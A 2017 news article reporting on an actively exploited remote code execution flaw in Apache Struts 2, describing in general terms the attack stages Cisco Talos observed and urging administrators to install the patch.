Email
Password
Remember meForgot password?
    Log in with Twitter

article imageCritical web server bug puts thousands of sites at immediate risk

By James Walker     Mar 9, 2017 in Technology
Administrators in charge of web servers used by major apps, governments and banks are scrambling to install patches for a potentially catastrophic vulnerability found in a popular web development framework. The flaw is being actively exploited.
The bug allows an attacker to execute arbitrary code on the web server, giving them the ability to access or destroy data, create user accounts, lock out admins or install more malware. Two different exploitation techniques are known to be in use and the Cisco Talos researchers who discovered the issue warned of a "high number" of attack attempts.
In the past two days since Cisco's public disclosure, the number of attacks has ballooned as hackers rush to take advantage of the serious issue. It lies in Apache Struts 2, a framework that developers can use to create web applications in the Java programming language. Struts is a popular framework with widespread use, including by highly-sensitive services.
The developers behind Struts have already issued a patch for the vulnerability that resolves the problem. However, most Struts servers haven't yet been updated. Until administrators have installed the new version, their apps remain at risk of attack. Hackers are scanning the Internet to identify vulnerable servers.
Cisco has observed three primary attacks that are currently being deployed. The first is a low-level scan that runs an innocuous Linux command. If the server responds with the command's output, the attacker knows it is vulnerable and can follow-up with a series of malicious scripts.
At present, the aggressive forms of the attack are taking actions to shut down security applications on the server and then install malware. Programs that have been installed include a denial of service bot and an IRC chat bouncer.
The final class of command being sent to Struts servers aims to achieve persistent access to the machine. The attackers run system commands that copy their malware to the filesystem and then register it to run each time the server starts up. This allows them to continually monitor the machine and any changes to its data.
Cisco said the bug began to see widespread public exploitation after Apache publicly detailed the issue in a security advisory on Sunday. The company warned the volume of attacks is showing no signs of slowing down and is likely to see sustained exploitation for a significant amount of time. The vulnerability is trivial to exploit, requiring nothing more than a specially crafted HTTP request to be sent to the server.
"Upon deployment [of the advisory] we saw immediate exploitation occurring," said Cisco. "This exploitation has continued steadily since. It is likely that the exploitation will continue in a wide scale since it is relatively trivial to exploit and there are clearly systems that are potentially vulnerable."
With so many Struts servers in use, the bug is currently a highly attractive target for cybercriminals looking for easy hits. Although companies, governments and website administrators have been sent information on the importance of installing the update, it's likely it'll be some time before every system is fully protected.
More about Cybersecurity, Cybercrime, web servers, Vulnerability, exploit
 
Latest News
Top News